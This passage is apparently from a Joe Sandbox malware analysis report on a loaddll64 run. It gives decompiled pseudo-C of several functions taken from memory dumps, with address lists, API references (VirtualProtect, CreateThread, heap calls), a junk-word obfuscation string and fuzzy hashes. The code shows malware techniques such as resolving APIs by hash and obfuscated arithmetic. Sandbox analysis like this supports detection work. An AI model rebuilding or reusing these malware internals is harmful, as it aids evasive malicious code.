				if (_t131 == _t134) goto 0x640c32b4;
				_t18 = _t175 + 0xa0; // -14
				r9d = r12d;
				 *_t131();
				goto 0x640c32b6;
				if (0 == 0) goto 0x640c3469;
				E00000201201640C6C34(_t134,  *((intOrPtr*)(_t165 + 8)), _t165, _t168, _t130, _t18, _t167, _t170);
				if (_t131 == _t134) goto 0x640c3469;
				 *((intOrPtr*)(_t175 + 0x90)) = 0x100;
				if ( *((intOrPtr*)(_t175 + 0xb0)) == 0) goto 0x640c3326;
				 *((intOrPtr*)(_t175 + 0x40)) = 0xaa0;
				E00000201201640C908C(0xe7f09937, _t131,  *((intOrPtr*)(_t168 + 0x48)));
				if (_t131 == _t134) goto 0x640c3316;
				r9d = 4;
				 *_t131();
				asm("bts dword [esp+0x90], 0x17");
				goto 0x640c332b;
				E00000201201640C908C(0x7dda0345, _t131,  *((intOrPtr*)(_t168 + 0x48)));
				if (_t131 == _t134) goto 0x640c3350;
				r9d = 0;
				r8d = 0x50;
				 *_t131();
				goto 0x640c3353;
				_t132 = _t134;
				 *((long long*)(_t165 + 0x30)) = _t132;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t165 + 0x30)) == _t134) goto 0x640c3469;
				E00000201201640C6C34(_t134,  *((intOrPtr*)(_t165 + 0x10)), _t165, _t168, _t130, _t131);
				_t172 = _t132;
				if (_t132 == _t134) goto 0x640c3469;
				E00000201201640C908C(0xaa9d9fc1, _t132,  *((intOrPtr*)(_t168 + 0x48)));
				if (_t132 == _t134) goto 0x640c33de;
				_t163 =  !=  ?  *0x640cd448 + 0x201640d1250 :  *0x640cd448 + 0x201640d1268;
				r9d = 0;
				 *((intOrPtr*)(_t175 + 0x30)) =  *((intOrPtr*)(_t175 + 0x90));
				 *((long long*)(_t175 + 0x28)) = _t134;
				 *((long long*)(_t175 + 0x20)) = _t134;
				 *_t132();
				goto 0x640c33e1;
				_t133 = _t134;
				 *((long long*)(_t165 + 0x38)) = _t133;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t165 + 0x38)) == _t134) goto 0x640c3469;
				 *((intOrPtr*)(_t175 + 0x44)) = 4;
				E00000201201640C908C(0x677ec78c, _t133,  *((intOrPtr*)(_t168 + 0x48)));
				_t48 = _t172 + 0x1b; // 0x1f
				r12d = _t48;
				if (_t133 == _t134) goto 0x640c3431;
				 *_t133();
				goto 0x640c3433;
				if (0 == 0) goto 0x640c3487;
				asm("bts dword [esp+0x90], 0x8");
				E00000201201640C908C(0xe7f09937, _t133,  *((intOrPtr*)(_t168 + 0x48)));
				if (_t133 == _t134) goto 0x640c3487;
				r9d = 4;
				 *_t133();
				goto 0x640c3487;
				E00000201201640C908C(0xc06f8334, _t133,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t133 == _t134) goto 0x640c3482;
				 *_t133();
				goto 0x640c3487;
				return 0x7f;
			}

























                                0x201640c31c0
                                0x201640c31c0
                                0x201640c31c5
                                0x201640c31ca
                                0x201640c31da
                                0x201640c31e5
                                0x201640c31f3
                                0x201640c31f6
                                0x201640c31fe
                                0x201640c320b
                                0x201640c3211
                                0x201640c3215
                                0x201640c3215
                                0x201640c3219
                                0x201640c321b
                                0x201640c3221
                                0x201640c3223
                                0x201640c322a
                                0x201640c322c
                                0x201640c323d
                                0x201640c3245
                                0x201640c324e
                                0x201640c3251
                                0x201640c3257
                                0x201640c325b
                                0x201640c325d
                                0x201640c325f
                                0x201640c326a
                                0x201640c326e
                                0x201640c3278
                                0x201640c328a
                                0x201640c3292
                                0x201640c329a
                                0x201640c32a0
                                0x201640c32a8
                                0x201640c32b0
                                0x201640c32b2
                                0x201640c32b8
                                0x201640c32c4
                                0x201640c32cf
                                0x201640c32d5
                                0x201640c32e7
                                0x201640c32ef
                                0x201640c32f7
                                0x201640c32ff
                                0x201640c3305
                                0x201640c3314
                                0x201640c3316
                                0x201640c3324
                                0x201640c3334
                                0x201640c333c
                                0x201640c3342
                                0x201640c3345
                                0x201640c334c
                                0x201640c334e
                                0x201640c3350
                                0x201640c335b
                                0x201640c335f
                                0x201640c3369
                                0x201640c3375
                                0x201640c337a
                                0x201640c3380
                                0x201640c338f
                                0x201640c3397
                                0x201640c33ba
                                0x201640c33c5
                                0x201640c33c8
                                0x201640c33d0
                                0x201640c33d5
                                0x201640c33da
                                0x201640c33dc
                                0x201640c33de
                                0x201640c33e9
                                0x201640c33ed
                                0x201640c33f7
                                0x201640c3403
                                0x201640c340b
                                0x201640c3410
                                0x201640c3410
                                0x201640c3417
                                0x201640c342d
                                0x201640c342f
                                0x201640c3435
                                0x201640c3437
                                0x201640c3449
                                0x201640c3451
                                0x201640c345f
                                0x201640c3465
                                0x201640c3467
                                0x201640c3472
                                0x201640c347a
                                0x201640c347c
                                0x201640c3480
                                0x201640c34a0

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID:
                                • API String ID: 3901518246-0
                                • Opcode ID: bb3dd621c95c53055fcba926f55aa16ae10003733876a93a6dfeee260ac781c3
                                • Instruction ID: f9bfb8bc1bec50d693624aa94dc542e1111a3951b48ed9a2f7f26a4548020059
                                • Opcode Fuzzy Hash: bb3dd621c95c53055fcba926f55aa16ae10003733876a93a6dfeee260ac781c3
                                • Instruction Fuzzy Hash: C48181323147A0D7EB20DF92E84A3DA63A5F788784F544425AB4E47F8ACF3AD465C708
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C204C Relevance: 3.9, APIs: 3, Instructions: 163memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 31%
                                			E00000201201640C204C(long long __rbx, intOrPtr* __rcx, void* __r8) {
				signed long long _t114;
				void* _t138;
				long _t141;
				long long _t144;
				signed long long _t146;
				signed long long _t148;
				void* _t149;
				long _t160;
				signed long long _t161;
				long _t163;
				void* _t166;

				_t114 = _t148;
				 *((long long*)(_t114 + 0x18)) = __rbx;
				 *((long long*)(_t114 + 0x20)) = _t144;
				_t149 = _t148 - 0x40;
				r14d = 0;
				 *(_t114 + 0x10) = r14d;
				 *(__rcx + 0x5c) = r14d;
				if ( *((intOrPtr*)(__rcx + 0x58)) != r14d) goto 0x640c2275;
				 *((intOrPtr*)(_t114 + 8)) = 4;
				E00000201201640C908C(0x5431d47a, _t114,  *((intOrPtr*)( *__rcx + 0x48)));
				if (_t114 == _t166) goto 0x640c20af;
				 *_t114();
				goto 0x640c20b2;
				if (r14d == r14d) goto 0x640c2257;
				E00000201201640C908C(0xbe782669, _t114,  *((intOrPtr*)( *__rcx + 0x48)));
				if (_t114 == _t166) goto 0x640c20f6;
				_t11 = _t149 + 0x78; // -6
				r8d = 0;
				 *((long long*)(_t149 + 0x28)) = _t11;
				_t14 = _t149 + 0x70; // -14
				 *(_t149 + 0x20) = _t14;
				 *_t114();
				goto 0x640c20f9;
				if (r14d == r14d) goto 0x640c2257;
				 *(_t149 + 0x78) = r14d;
				 *(_t149 + 0x70) = r14d;
				E00000201201640C908C(0xbe782669, _t114,  *((intOrPtr*)( *__rcx + 0x48)));
				if (_t114 == _t166) goto 0x640c2143;
				_t20 = _t149 + 0x78; // -6
				r9d = 0;
				r8d = 0;
				 *((long long*)(_t149 + 0x28)) = _t20;
				_t22 = _t149 + 0x70; // -14
				 *(_t149 + 0x20) = _t22;
				 *_t114();
				r8d =  *(_t149 + 0x70);
				HeapAlloc(_t166, _t163, _t160);
				_t161 = _t114;
				if (_t114 == _t166) goto 0x640c2250;
				E00000201201640C908C(0xbe782669, _t114,  *((intOrPtr*)( *__rcx + 0x48)));
				if (_t114 == _t166) goto 0x640c219c;
				_t28 = _t149 + 0x78; // -6
				r8d = 0;
				 *((long long*)(_t149 + 0x28)) = _t28;
				_t30 = _t149 + 0x70; // -14
				 *(_t149 + 0x20) = _t30;
				 *_t114();
				goto 0x640c219f;
				if (r14d == r14d) goto 0x640c2222;
				 *(_t149 + 0x70) =  *(_t149 + 0x70) >> 1;
				 *((intOrPtr*)(_t161 + _t114 * 2)) = r14w;
				r8d =  *(_t149 + 0x70);
				HeapAlloc(_t138, _t141);
				_t146 = _t114;
				if (_t114 == _t166) goto 0x640c221b;
				E00000201201640C908C(0x880a500a, _t114,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t114 == _t166) goto 0x640c2210;
				r9d =  *(_t149 + 0x70);
				 *(_t149 + 0x38) = _t166;
				 *(_t149 + 0x30) = _t166;
				 *((intOrPtr*)(_t149 + 0x28)) = _t161 + 1;
				 *(_t149 + 0x20) = _t146;
				 *(_t149 + 0x70) =  *_t114();
				goto 0x640c2215;
				 *(_t149 + 0x70) = r14d;
				 *(__rcx + 0x20) = _t146;
				goto 0x640c2240;
				goto 0x640c2240;
				E00000201201640C908C(0xc06f8334, _t114,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t114 == _t166) goto 0x640c223b;
				 *_t114();
				goto 0x640c2240;
				HeapFree(??, ??, ??);
				goto 0x640c2275;
				goto 0x640c2275;
				E00000201201640C908C(0xc06f8334, _t114,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t114 == _t166) goto 0x640c2270;
				 *_t114();
				goto 0x640c2275;
				return 0x7f;
			}














                                0x201640c204c
                                0x201640c204f
                                0x201640c2053
                                0x201640c205f
                                0x201640c2074
                                0x201640c207a
                                0x201640c207e
                                0x201640c2085
                                0x201640c208b
                                0x201640c209b
                                0x201640c20a3
                                0x201640c20ab
                                0x201640c20ad
                                0x201640c20b5
                                0x201640c20c4
                                0x201640c20cc
                                0x201640c20ce
                                0x201640c20d7
                                0x201640c20da
                                0x201640c20df
                                0x201640c20e9
                                0x201640c20f2
                                0x201640c20f4
                                0x201640c20fc
                                0x201640c2102
                                0x201640c2107
                                0x201640c2115
                                0x201640c211d
                                0x201640c211f
                                0x201640c2124
                                0x201640c2127
                                0x201640c212a
                                0x201640c212f
                                0x201640c2138
                                0x201640c2141
                                0x201640c2143
                                0x201640c2151
                                0x201640c2157
                                0x201640c215d
                                0x201640c216c
                                0x201640c2174
                                0x201640c2176
                                0x201640c217b
                                0x201640c2181
                                0x201640c2186
                                0x201640c218f
                                0x201640c2198
                                0x201640c219a
                                0x201640c21a2
                                0x201640c21af
                                0x201640c21b3
                                0x201640c21b8
                                0x201640c21c0
                                0x201640c21c6
                                0x201640c21cc
                                0x201640c21d7
                                0x201640c21e2
                                0x201640c21e4
                                0x201640c21e9
                                0x201640c21ee
                                0x201640c21fc
                                0x201640c2202
                                0x201640c220a
                                0x201640c220e
                                0x201640c2210
                                0x201640c2215
                                0x201640c2219
                                0x201640c2220
                                0x201640c222b
                                0x201640c2233
                                0x201640c2235
                                0x201640c2239
                                0x201640c2248
                                0x201640c224e
                                0x201640c2255
                                0x201640c2260
                                0x201640c2268
                                0x201640c226a
                                0x201640c226e
                                0x201640c228f

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Alloc$ErrorFreeLast
                                • String ID:
                                • API String ID: 861356407-0
                                • Opcode ID: 0d16cc31d8c4b20fd9f3a2fec83417e35b9a07ea40dd460ae92dda63533fb1d6
                                • Instruction ID: 8ed5c75b418230f8f0b06644f7260a37ec3b44651f73bdfd9761fc19c6c3d728
                                • Opcode Fuzzy Hash: 0d16cc31d8c4b20fd9f3a2fec83417e35b9a07ea40dd460ae92dda63533fb1d6
                                • Instruction Fuzzy Hash: BB51CF32704750D7EB20CFA6E8456AE63A4F7C8784F201415BF8D53B6ACF3AC4A18B08
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C34A4 Relevance: 3.9, APIs: 3, Instructions: 160memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 29%
                                			E00000201201640C34A4(long long __rbx, long long __rcx, signed long long __rdx, long long __r8, long long _a8, signed int _a16, char _a24, long long _a32) {
				long long _v72;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t28;
				intOrPtr _t29;
				signed short _t31;
				void* _t33;
				signed short _t50;
				signed short _t51;
				signed short _t55;
				signed long long _t88;
				signed long long _t97;
				signed long long _t106;
				void* _t109;
				signed long long _t110;
				intOrPtr* _t111;
				void* _t112;
				void* _t113;
				long long _t116;
				void* _t117;
				void* _t118;
				long long _t123;
				signed long long _t124;
				void* _t130;

				_t123 = __r8;
				_t106 = __rdx;
				_t89 = __rbx;
				_a32 = __rbx;
				_a8 = __rcx;
				_t88 = __rdx;
				if (__rdx == _t109) goto 0x640c369e;
				if ( *__rdx == dil) goto 0x640c369e;
				E00000201201640C6C34(__rbx, __rdx, _t109, _t113, _t118, __r8);
				if (_t88 == _t109) goto 0x640c3699;
				E00000201201640C97A0(0, _t88, _t89, _t113, _t118, __r8);
				r8d = 0;
				_t119 = _t88;
				if (_t88 == _t123) goto 0x640c3684;
				r12d = _a16 & 0x0000ffff;
				_t110 = _t88;
				_t28 =  *_t110 & 0x0000ffff;
				if (_t28 == r8w) goto 0x640c353e;
				if (_t28 == 0x7c) goto 0x640c3538;
				_t29 =  *((intOrPtr*)(_t110 + 2));
				if (_t29 != r8w) goto 0x640c3525;
				if (_t29 != r8w) goto 0x640c3541;
				_t116 = _t123;
				if (_t116 == _t123) goto 0x640c3555;
				_t117 = _t116 + 2;
				goto 0x640c357e;
				E00000201201640C908C(0xf502ade, _t88,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				r8d = 0;
				if (_t88 == _t123) goto 0x640c357b;
				_t97 = _t110;
				_t31 =  *_t88();
				r8d = 0;
				_a16 = _t31;
				goto 0x640c3582;
				_t50 = r8d;
				_a16 = _t50;
				if (_t50 == r8d) goto 0x640c35b8;
				_t8 = _t97 - 1; // -1
				_t55 = _t8;
				r12w =  *(_t110 + _t106 * 2);
				if (r12w == 0x20) goto 0x640c359d;
				if (r12w != 9) goto 0x640c35a8;
				_t51 = _t55;
				_a16 = _t55;
				if (_t55 != r8d) goto 0x640c3587;
				if (_t51 == r8d) goto 0x640c35b8;
				r12w =  *_t110;
				if (r12w == 0x20) goto 0x640c35bf;
				if (r12w != 9) goto 0x640c35cb;
				_t111 = _t110 + 2;
				_a16 = _t51 - 1;
				goto 0x640c35a8;
				 *((intOrPtr*)(_t111 + _t88 * 2)) = r8w;
				if ( *_t111 == r8w) goto 0x640c3607;
				_v72 = _t123;
				r9d = 0;
				_t124 = _t88;
				_t33 = E00000201201640C8D50(_t89, _a8, _t111, _t111, _t117, _t88, _t124);
				r8d = 0;
				if (_t33 != r8d) goto 0x640c365a;
				_t112 = _t117;
				if (_t117 == _t124) goto 0x640c360c;
				goto 0x640c3519;
				if (_t33 != r8d) goto 0x640c365a;
				if (E00000201201640C69A0(_t33 - r8d, _t89, _t88,  &_a24, _t117, _t119,  &_a16, _t130) != 0) goto 0x640c365c;
				r9d = _a16;
				E00000201201640C90D8(_t89, _a8, _t112, _t117, _a24);
				HeapFree(??, ??, ??);
				goto 0x640c365c;
				E00000201201640C908C(0x77c56b19, _t88,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t88 == _t112) goto 0x640c3674;
				 *_t88();
				HeapFree(??, ??, ??);
				goto 0x640c3689;
				HeapFree(??, ??, ??);
				goto 0x640c369e;
				return 8;
			}




























                                0x201640c34a4
                                0x201640c34a4
                                0x201640c34a4
                                0x201640c34a4
                                0x201640c34a9
                                0x201640c34c6
                                0x201640c34d5
                                0x201640c34de
                                0x201640c34e9
                                0x201640c34f4
                                0x201640c34fc
                                0x201640c3501
                                0x201640c3504
                                0x201640c350a
                                0x201640c3510
                                0x201640c3516
                                0x201640c3519
                                0x201640c3523
                                0x201640c3529
                                0x201640c352f
                                0x201640c3536
                                0x201640c353c
                                0x201640c353e
                                0x201640c3544
                                0x201640c354f
                                0x201640c3553
                                0x201640c355e
                                0x201640c3563
                                0x201640c3569
                                0x201640c356b
                                0x201640c356e
                                0x201640c3570
                                0x201640c3575
                                0x201640c3579
                                0x201640c357b
                                0x201640c357e
                                0x201640c3585
                                0x201640c3587
                                0x201640c3587
                                0x201640c358a
                                0x201640c3594
                                0x201640c359b
                                0x201640c359d
                                0x201640c359f
                                0x201640c35a6
                                0x201640c35ab
                                0x201640c35ad
                                0x201640c35b6
                                0x201640c35bd
                                0x201640c35bf
                                0x201640c35c5
                                0x201640c35c9
                                0x201640c35cd
                                0x201640c35d6
                                0x201640c35dd
                                0x201640c35e2
                                0x201640c35e5
                                0x201640c35eb
                                0x201640c35f0
                                0x201640c35f8
                                0x201640c35fa
                                0x201640c3600
                                0x201640c3602
                                0x201640c360a
                                0x201640c3627
                                0x201640c3629
                                0x201640c363e
                                0x201640c3652
                                0x201640c3658
                                0x201640c3665
                                0x201640c366d
                                0x201640c3672
                                0x201640c367c
                                0x201640c3682
                                0x201640c3691
                                0x201640c3697
                                0x201640c36b7

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID:
                                • API String ID: 3901518246-0
                                • Opcode ID: c7f4851af72390d08a83b741b1e5df915c470d94f4f546358617c873bfd904c4
                                • Instruction ID: 319f34f4993c139eb63fd85797b3db770d2be160acd6e2f44c8bdef222b669e9
                                • Opcode Fuzzy Hash: c7f4851af72390d08a83b741b1e5df915c470d94f4f546358617c873bfd904c4
                                • Instruction Fuzzy Hash: 8F510C61720770C3FB6497269D4A7EDA295B78C7C4F948015BF4943F9EDE3AC8A28708
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E9BA0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 315threadCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00007FFC7FFC130E9BA0(void* __rax, void* __rcx, void* __rdx, long long __r8, void* __r10, void* __r11, intOrPtr _a8, long long _a24, intOrPtr _a32, intOrPtr _a48, intOrPtr _a56, intOrPtr _a64, intOrPtr _a72, intOrPtr _a80, intOrPtr _a96, intOrPtr _a104) {
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _t88;
				signed long long _t121;
				long long _t123;
				intOrPtr _t126;
				signed long long _t130;

				_a32 = r9d;
				_a24 = __r8;
				r10d = _a80;
				r11d = _a72;
				r11d = r11d + 0xffffd852;
				r8d = __rdx - 0x882;
				_a80 = __rcx - 0x38e9;
				_v84 = r8d;
				_t88 = __rdx - 0x27ae;
				r8d = __rax - 0x113b;
				_v76 = _t88;
				_a72 = r11d;
				_a96 = _a104 + 0x10a3;
				_v88 = __r10 - 0x113b;
				_a56 = _a48 + 0xffffdfce;
				_v72 = __rax + 0x106;
				_a8 = __rax + 0x1371;
				_t121 =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x2e8)) + 0x3c)) +  *((intOrPtr*)(__r8 + 0x2e8));
				 *(__r8 + 0x2f0) = _t121;
				_t130 = __r8 + 0x1f0;
				_a104 = __rdx + 0x1033;
				 *(__r8 + 0x2f8) = _t121 ^ 0x000023f7;
				if ( *_t130 -  *((intOrPtr*)(__r8 + 0x1c8)) > 0) goto 0x130e9cd0;
				 *(__r8 + 0x198) = " periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway confessed nearby analysis hazard struck pigeon branches persuade stretch previous mute frail flank cone winner combination plane wander sack children traverse skip probability plays dagger midst throne whip final particles trick compassion selling replacement prospect even relay between quarter beg monks yell speedometer dam ";
				 *(__r8 + 0x198) =  *(__r8 + 0x198) | _t130;
				_t123 =  *((intOrPtr*)(__r8 + 0x2d8));
				 *((long long*)(__r8 + 0x318)) = _t123;
				_a48 = __r10 - 0x283;
				_a64 = __r10 - 0x64c;
				 *((long long*)(__r8 + 0x320)) =  *((intOrPtr*)(_t123 + 0x3c)) + _t123;
				 *(__r8 + 0x120) = 0x1137;
				 *(__r8 + 0xc8) =  *(__r8 + 0xc8) * ( *(__r8 + 0x1c0) | 0x00003595);
				 *((long long*)(__r8 + 0x308)) =  *((intOrPtr*)(__r8 + 0x2d8));
				 *(__r8 + 0x198) =  *(__r8 + 0x198) + 0xfffffef0 -  *((intOrPtr*)(__r8 + 0x1c8));
				_t126 =  *((intOrPtr*)(__r8 + 0x140));
				 *(__r8 + 0x58) =  *(__r8 + 0x58) |  *(_t126 + 0x198);
				 *(_t126 + 0x198) =  *(_t126 + 0x198) + 1;
				 *( *(__r8 + 0x1c0) + 0x48) =  *( *(__r8 + 0x1c0) + 0x48) ^ ( *(__r8 + 0x120) | 0x0000343a);
				if (r11d == _t130 - 0x1371) goto 0x130e9dce;
				if (_t88 - __r11 + 0x2103 >= 0) goto 0x130e9de1;
				 *((intOrPtr*)(__r8 + 0x310)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x320)) + 0x50));
				 *( *((intOrPtr*)(__r8 + 0x1c8)) + 0xc8) =  *( *((intOrPtr*)(__r8 + 0x1c8)) + 0xc8) ^  *(__r8 + 0xe0) * 0x00002598;
				return __r8 + 0x927;
			}












                                0x7ffc130e9ba0
                                0x7ffc130e9ba5
                                0x7ffc130e9bc2
                                0x7ffc130e9bcd
                                0x7ffc130e9bdf
                                0x7ffc130e9be6
                                0x7ffc130e9bed
                                0x7ffc130e9bf4
                                0x7ffc130e9bfc
                                0x7ffc130e9c02
                                0x7ffc130e9c09
                                0x7ffc130e9c22
                                0x7ffc130e9c2a
                                0x7ffc130e9c38
                                0x7ffc130e9c46
                                0x7ffc130e9c59
                                0x7ffc130e9c67
                                0x7ffc130e9c72
                                0x7ffc130e9c7b
                                0x7ffc130e9c82
                                0x7ffc130e9c89
                                0x7ffc130e9ca4
                                0x7ffc130e9cc0
                                0x7ffc130e9cc9
                                0x7ffc130e9cd0
                                0x7ffc130e9cde
                                0x7ffc130e9cec
                                0x7ffc130e9cf3
                                0x7ffc130e9cfa
                                0x7ffc130e9d08
                                0x7ffc130e9d1d
                                0x7ffc130e9d33
                                0x7ffc130e9d41
                                0x7ffc130e9d56
                                0x7ffc130e9d5d
                                0x7ffc130e9d6b
                                0x7ffc130e9d6f
                                0x7ffc130e9d8a
                                0x7ffc130e9d97
                                0x7ffc130e9da2
                                0x7ffc130e9dae
                                0x7ffc130e9dc7
                                0x7ffc130e9de0

                                APIs
                                  • Part of subcall function 00007FFC130F7C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FFC130EA050), ref: 00007FFC130F7CFC
                                  • Part of subcall function 00007FFC130F7C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FFC130EA050), ref: 00007FFC130F7E18
                                • CreateThread.KERNEL32 ref: 00007FFC130EA238
                                Strings
                                • periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway confessed nearby analysis hazard , xrefs: 00007FFC130E9CC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ProtectVirtual$CreateThread
                                • String ID: periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway confessed nearby analysis hazard
                                • API String ID: 3076554488-3474123047
                                • Opcode ID: 4263ff401d75dabcc09657429b698b9b49345b6e88aabbc26032a9ba9cf8f7b2
                                • Instruction ID: 7aa72a8c8360acabfc69f9a29f08cc02608c01e6ce324a6e3fa985b3efb6a692
                                • Opcode Fuzzy Hash: 4263ff401d75dabcc09657429b698b9b49345b6e88aabbc26032a9ba9cf8f7b2
                                • Instruction Fuzzy Hash: 11024A736186D48BD3A5CF19E485BDEB7A8F788744F01412AEB8953B58DB38DA64CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E90B0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 263COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 30%
                                			E00007FFC7FFC130E90B0(void* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __r8, void* __r11, long long _a8, signed int _a16, signed int _a24, signed int _a40, signed int _a48, signed int _a56, signed int _a64, signed int _a72, signed int _a80, signed int _a96, signed int _a104, signed int _a112) {
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v88;
				signed int _v96;
				signed int _v104;
				signed int _v112;
				signed int _v120;
				signed int _v128;
				signed int _v136;
				signed int _v144;
				signed int _v152;
				signed int _v160;
				signed int _v168;
				void* __rdi;
				signed int _t159;
				intOrPtr _t162;
				signed int _t164;
				signed int _t172;
				signed int _t173;
				intOrPtr _t198;
				signed int _t214;
				void* _t229;
				intOrPtr _t243;
				signed int _t256;
				signed long long _t259;
				signed long long _t260;
				signed long long _t262;
				long long _t269;
				signed long long _t272;
				void* _t273;
				void* _t284;
				signed long long _t285;
				void* _t290;
				void* _t293;
				void* _t294;
				void* _t295;
				void* _t296;

				_a8 = __rbx;
				r12d = __rdx - 0x3a59;
				r11d = _a72;
				r13d = __rdx - 0x1663;
				r15d = _a56;
				r14d = _a96;
				r8d = r8d + 0xfffff374;
				_a40 = __rcx - 0x329d;
				r10d = _t296 + 0x4c0;
				_a24 = _a80 + 0x2b1;
				_v68 = r12d;
				_v72 = __r11 - 0x3189;
				r11d = r11d + 0x4dd;
				_a64 = r10d;
				_a80 = _a64 + 0xfffffbf4;
				r10d = r10d + 0xffffee61;
				_a104 = r8d;
				r8d = __rax - 0x19bd;
				r9d = __rax - 0x202;
				_a72 = r8d;
				_a16 = r9d;
				_a56 = __rcx + 0x2f8;
				r9d = r9d + 0xffffed0f;
				_v64 = _t295 + 0x13eb;
				_v96 = _t293 + 0x38e9;
				r8d = _t294 - 0x2f3;
				_v104 = r10d;
				_v112 = r11d;
				_v120 = r14d;
				_v128 = __r8 + 0x125d;
				_t256 = _a48;
				_v136 = _t294 + 0x119f;
				_v144 = r15d;
				_v152 = _a112 + 0xffffeb0d;
				_v160 = _t256;
				_v168 = __rcx + 0x278;
				_t159 = E00007FFC7FFC13100720(__rcx, _t273, __r8, _t284, _t290);
				_t259 =  *((intOrPtr*)(_t256 + 0x23c));
				r8d = 0x2032;
				 *(_t256 + 0x158) = _t259;
				_t285 =  *((intOrPtr*)(_t256 + 0x1a0));
				_a96 = _t159;
				if (( *(_t285 + 0x130) ^ 0x000003c5) - r8d < 0) goto 0x130e929f;
				asm("o16 nop [eax+eax]");
				_t269 =  *((intOrPtr*)(_t256 + 0xc8)) + (_t285 | __r8);
				r8d = r8d + 1;
				 *((long long*)(_t256 + 0xc8)) = _t269;
				_t260 = _t259 ^ 0x000003c5;
				if (r8d - _t260 <= 0) goto 0x130e9280;
				_t243 =  *((intOrPtr*)(_t256 + 0x1c8));
				_v120 = 0x13103850;
				_v128 = 0x40;
				r8d = 0x2032;
				_v136 = 0xbb;
				r9d = 0x2103;
				_v144 =  *((intOrPtr*)(_t243 + 0xb0)) - 0x27ab;
				_v152 =  *((intOrPtr*)(_t256 + 0x130)) - 0x22cb;
				_v160 = 0x30d5;
				_v168 = _t256;
				_t162 = E00007FFC7FFC130FF290(0x2598, 0x27b2, _t256, _t273, __r8, 0x13103850);
				r11d = _a72;
				r11d = r11d + 0x4ca;
				r9d = _t260 - 0x77c;
				_v136 = _t256;
				r10d = _t260 - 0x522;
				 *((intOrPtr*)(_t256 + 0x23c)) = _t162;
				r8d = _t269 - 0x16b5;
				 *((long long*)(_t256 + 0x198)) =  *((long long*)(_t256 + 0x198)) + 0x228c;
				_v144 = _t273 - 0x1337;
				_v152 = r9d;
				r9d = r8d;
				_v160 = r10d;
				_v168 = r11d;
				_t164 = E00007FFC7FFC130FDA50(_t260, 0x13103850, _t285 + 0x130);
				r10d = _a112;
				_a16 = _t164;
				r10d = r10d + 0xfffff8a0;
				if (r12d == _t243 - 0x17b) goto 0x130e95f7;
				_t86 = _t269 - 0x13eb; // -5099
				if (_t295 + 0x13eb == _t86) goto 0x130e941a;
				 *(_t256 + 0x158) =  *((intOrPtr*)(_t256 + 0x98));
				if ( *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x30)) + 0x130)) + 0x1045 == 0x343a) goto 0x130e95f7;
				asm("o16 nop [eax+eax]");
